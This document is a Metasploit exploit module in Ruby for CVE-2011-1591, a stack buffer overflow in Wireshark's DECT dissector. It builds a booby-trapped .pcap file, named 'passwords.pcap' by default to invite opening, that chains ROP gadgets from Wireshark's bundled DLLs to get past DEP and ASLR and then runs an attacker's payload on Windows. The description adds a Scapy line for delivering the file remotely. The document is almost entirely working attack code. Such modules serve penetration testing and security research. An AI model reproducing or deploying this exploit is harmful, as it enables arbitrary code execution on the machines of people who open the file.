## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow (local)', 'Description' => %q{ This module exploits a stack buffer overflow in Wireshark <= 1.4.4 When opening a malicious .pcap file in Wireshark, a stack buffer occurs, resulting in arbitrary code execution. Note: To exploit the vulnerability remotely with Scapy: sendp(rdpcap("file")) }, 'License' => MSF_LICENSE, 'Author' => [ 'Paul Makowski', #Initial discovery 'sickness', #proof of concept 'corelanc0d3r ', #rop exploit + msf module ], 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-1591'], [ 'OSVDB', '71848'], [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838' ], [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836' ], [ 'EDB', 17185 ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 936, 'DisableNops' => 'True', }, 'Platform' => 'win', 'Targets' => [ [ 'Win32 Universal (Generic DEP & ASLR Bypass)', { 'OffSet' => 1243, 'Ret' => 0x667c484d, #libgnutl pivot - tx Lincoln } ], ], 'Privileged' => false, 'DisclosureDate' => 'Apr 18 2011', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ true, 'pcap file', 'passwords.pcap']), ], self.class) end def junk return rand_text(4).unpack("L")[0].to_i end def exploit print_status("Creating '#{datastore['FILENAME']}' file ...") global_header = "\xd4\xc3\xb2\xa1" # magic_number global_header << "\x02\x00" # major version global_header << "\x04\x00" # minor version global_header << "\x00\x00\x00\x00" # GMT to local correction global_header << "\x00\x00\x00\x00" # accuracy global_header << "\xff\x7f\x00\x00" # snaplen global_header << "\x01\x00\x00\x00" # data link type packet_header = "\x26\x32\xac\x4d" #timestamp seconds packet_header << "\xda\xfa\x00\x08" #timestamp microseconds packet_header << "\xdc\x05\x00\x00" #nr of octets of packet in file packet_header << "\xdc\x05\x00\x00" #actual size of packet (1500) ptype = "\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x23\x23" print_status("Preparing payload") pivot = [target.ret].pack('V') # pvefindaddr rop 'n roll # tx dadr00p (https://twitter.com/dietersar) for testing the offsets below rop_pivot = [ 0x618d7d0e, # RET 0x618d7d0e, # RET 0x618d7d0e, # RET 0x64f9d5ec, # ADD ESP,0C # RET - libfontconfig-1.dll 0x618d7d0e, # RET <- don't count on this one ! 0x618d7d0e, # RET 0x618d7d0e, # RET 0x618d7d0e, # RET 0x61C14268, # ADD ESP,24 # RETN - freetype6.dll 0xFFFFFFFF, # crash baby ! 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0x618d7d0e, 0x618d7d0e, 0x618d7d0e, 0x618d7d0e, ].pack("V*") rop_gadgets = [ 0x6d7155cb, # PUSH ESP # POP EBX # POP EBP # RETN **[libpangoft2-1.0-0.dll] junk, 0x6d596e31, # MOV EAX,EBX # POP EBX # POP EBP # RETN **[libgio-2.0-0.dll] junk, junk, 0x61c14552, # POP EBX # RETN ** [freetype6.dll] 0x00000800, # size - 0x800 should be more than enough 0x61c14043, # POP ESI # RETN ** [freetype6.dll] 0x0000009C, 0x6d58321a, # ADD EAX,ESI # POP ESI # POP EBP # RETN **[libgio-2.0-0.dll] junk, junk, 0x68610a27, # XCHG EAX,EBP # RETN ** [libglib-2.0-0.dll] 0x629445a6, # POP EAX # RETN ** [libatk-1.0-0.dll] 0x62d9027c, # 0x6c385913, # MOV EAX,DWORD PTR DS:[EAX] # ADD CL,CL # RETN ** [libgdk-win32-2.0-0.dll] 0x617bc526, # XCHG EAX,ESI # ADD AL,10 # ADD CL,CL # RETN ** [libgtk-win32-2.0-0.dll] 0x64f8c692, # POP EDX # RETN ** [libfontconfig-1.dll] 0x00000040, # 0x619638db, # POP ECX # RETN ** [libgtk-win32-2.0-0.dll] 0x6536B010, # RW 0x618d7d0d, # POP EDI # RETN ** [libgtk-win32-2.0-0.dll] 0x618d7d0e, # RET 0x64fa0c15, # POP EAX # RETN ** [libfontconfig-1.dll] 0x618d7d0e, # RET 0x61963fdb, # PUSHAD # RETN ** [libgtk-win32-2.0-0.dll] ].pack("V*") pivot = [target.ret].pack('V') buffer = rand_text(131) buffer << rop_pivot buffer << rop_gadgets nops = make_nops(target['OffSet'] - (buffer.length) - (payload.encoded.length)) buffer << nops buffer << payload.encoded buffer << pivot filler = 1500 - buffer.length buffer << rand_text(filler) filecontent = global_header filecontent << packet_header filecontent << ptype filecontent << buffer print_status("Writing payload to file, " + filecontent.length.to_s()+" bytes") file_create(filecontent) end end